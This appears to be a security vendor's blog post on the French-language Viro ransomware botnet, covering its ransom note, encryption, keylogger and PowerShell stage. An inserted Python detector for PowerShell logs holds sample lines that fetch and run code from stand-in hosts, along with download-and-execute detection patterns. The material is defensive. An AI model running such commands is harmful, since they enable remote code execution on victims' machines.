The latest, strangest new ransomware appears to come from France, or at least from French-speaking cyber attackers.
If your Windows PC has been successfully infected by the brand new Viro botnet ransomware, you will see this ransom note no matter where in le monde you are. Tout le monde is a possible target:
Vos fichiers personnels ont été chiffré.
Pour les déchiffrer, evonyez 500€ de bitcoins à cette adresse: xxxxx
Toute tentative de destruction de ce logiciel entraïnera la destruction da la clé de déchiffrement.
Toute tentative de déchiffrement avec une clé erronée entraïnera la perte définitive de vos fichiers.
Vous avez 72 heures pour effectuer le paiement. Après quoi, la clé de déchiffrement sera supprimée.
I understand French seulement un peu, so I’ll attempt an imperfect translation. I learned that les fichiers are files, and chiffré is encryption, so let’s give it a go:
Your personal files have become encrypted.
To decrypt them, send €500 worth of Bitcoin to this address: xxxxx
All attempts to destroy the software will lead to the destruction of the decryption key.
All attempts at decryption with the wrong key will lead to the loss of your files.
You have 72 hours to make your payment. After that, the decryption key will be deleted.
Contrary to popular belief, most Canadians aren’t English-French bilingual, and although my French is a little better than most Anglo Canadians, it’s still a bit weak. Oh well – c’est la vie.
Instances of ransomware are becoming a little bit less frequent in 2018 than in 2017. But many new ransomware strains are getting really, really weird. Viro botnet malware is an excellent example.
The Viro botnet attacks seen so far infect a user’s Windows machine through a malicious email attachment. If the user executes the attachment, a random encryption and decryption key is generated, which is also sent to the Viro command and control (C&C) servers.
The Viro malware then looks for two Windows registry keys, “ProductId” at “SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion” and “MachineGuid” at “SOFTWARE\\Microsoft\\Cryptography.” If both are found, the malware will then use an RSA cipher to encrypt all files with the following extensions
The list covers most important documents and media file types, but nothing that would prevent the user from using Windows in a basic way. Losing your documents is surely enough to compel most people to pay the ransom to the cyber attacker, but not enough to completely cripple them. There may be a method to the cyber attacker’s madness.
The ransom note will appear on the user’s screen when the encryption process commences. Then, the machine also becomes a part of the Viro botnet, sending emails with malicious attachments to other possible targets.
In the malware’s code, researchers have also found a keylogger which sends the logged keystrokes back to the C&C servers. They also found that infected targets may download more malware from the C&C servers and execute it through Windows PowerShell.
It appears that the cyber attackers have much greater ambition for Viro than just a botnet that transmits a unique strain of ransomware. The malware probably is still in development, and the PowerShell exploits could be used to completely control victims’ computers.
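A defender's counterpart to the PowerShell stage described above, added here as an example and not part of the original post or of any Comodo product: a small Python scanner that reads the ScriptBlockText of PowerShell script block log entries (Event ID 4104) and flags blocks that chain a network download primitive with an execution primitive, the pattern a stager that pulls additional malware from a C&C server and runs it would leave behind. The log lines are constructed for the example, not captured Viro traffic.

```python
import re

# Constructed sample of ScriptBlockText values from PowerShell script block
# logging (Event ID 4104). Made-up lines for this example, not real Viro traffic.
SAMPLE_SCRIPT_BLOCKS = [
    (1, "Get-ChildItem C:\\Users -Recurse | Measure-Object"),
    (2, "$c=New-Object Net.WebClient;$p=$c.DownloadString('http://c2.invalid/stage2.ps1');IEX $p"),
    (3, "Invoke-WebRequest -Uri http://dl.invalid/i.msi -OutFile $env:TEMP\\i.msi; Start-Process $env:TEMP\\i.msi"),
    (4, "Write-Output 'hello'"),
    (5, "iex (New-Object Net.WebClient).DownloadString('http://c2.invalid/a')"),
]

# Primitives that fetch content from the network (the download stage).
DOWNLOAD_PATTERNS = {
    "DownloadString": r"\.DownloadString\(",
    "DownloadFile": r"\.DownloadFile\(",
    "Invoke-WebRequest": r"Invoke-WebRequest|\biwr\b|\bwget\b|\bcurl\b",
    "Invoke-RestMethod": r"Invoke-RestMethod|\birm\b",
    "Start-BitsTransfer": r"Start-BitsTransfer",
    "WebClient": r"Net\.WebClient",
}
# Primitives that run whatever was fetched (the execute stage).
EXEC_PATTERNS = {
    "Invoke-Expression": r"Invoke-Expression|\biex\b",
    "Start-Process": r"Start-Process|\bsaps\b",
    "EncodedCommand": r"-EncodedCommand\b|-enc\b",
    "Assembly.Load": r"\[(System\.)?Reflection\.Assembly\]::Load",
}

def match_stage(text, patterns):
    """Return the names of every pattern in `patterns` found in `text` (case-insensitive)."""
    return [name for name, rx in patterns.items() if re.search(rx, text, re.IGNORECASE)]

def classify_script_block(text):
    """A block is suspicious only when it contains BOTH a download and an execute primitive."""
    downloads = match_stage(text, DOWNLOAD_PATTERNS)
    execs = match_stage(text, EXEC_PATTERNS)
    return {"download": downloads, "execute": execs, "suspicious": bool(downloads and execs)}

def find_download_and_execute(blocks):
    """Return (record_id, download_hits, exec_hits) for every block chaining both stages."""
    hits = []
    for record_id, text in blocks:
        verdict = classify_script_block(text)
        if verdict["suspicious"]:
            hits.append((record_id, verdict["download"], verdict["execute"]))
    return hits

if __name__ == "__main__":
    for record_id, dl, ex in find_download_and_execute(SAMPLE_SCRIPT_BLOCKS):
        print(f"record {record_id}: download={dl} execute={ex}")
```

Records 2, 3 and 5 are flagged; a plain directory listing or a download without any execution primitive is not, which keeps the rule focused on the staged download-and-run behaviour rather than on any single cmdlet.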
There’s no news yet as to whether or not paying the ransom will actually decrypt your files. Either way, never ever open an email attachment from an unfamiliar sender! Or check out Comodo Advanced Endpoint Protection, which will render even Viro harmless!